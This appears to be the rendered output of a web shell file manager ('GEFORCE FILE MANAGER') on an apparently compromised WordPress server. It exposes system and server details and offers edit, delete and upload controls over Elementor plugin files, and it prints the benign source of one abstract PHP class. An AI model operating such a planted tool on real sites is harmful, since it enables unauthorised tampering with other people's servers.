[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor
/
app
/
modules
/
import-export
/
runners
/
export
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 elementor-content.php
3,250 B
SET
[ EDIT ]
|
[ DEL ]
📄 export-runner-base.php
720 B
SET
[ EDIT ]
|
[ DEL ]
📄 plugins.php
558 B
SET
[ EDIT ]
|
[ DEL ]
📄 site-settings.php
2,326 B
SET
[ EDIT ]
|
[ DEL ]
📄 taxonomies.php
2,687 B
SET
[ EDIT ]
|
[ DEL ]
📄 templates.php
1,460 B
SET
[ EDIT ]
|
[ DEL ]
📄 wp-content.php
2,015 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: export-runner-base.php
<?php namespace Elementor\App\Modules\ImportExport\Runners\Export; use Elementor\App\Modules\ImportExport\Runners\Runner_Interface; abstract class Export_Runner_Base implements Runner_Interface { /** * By the passed data we should decide if we want to run the export function of the runner or not. * * @param array $data * * @return bool */ abstract public function should_export( array $data ); /** * Main function of the runner export process. * * @param array $data Necessary data for the export process. * * @return array{files: array, manifest: array} * The files that should be part of the kit and the relevant manifest data. */ abstract public function export( array $data ); }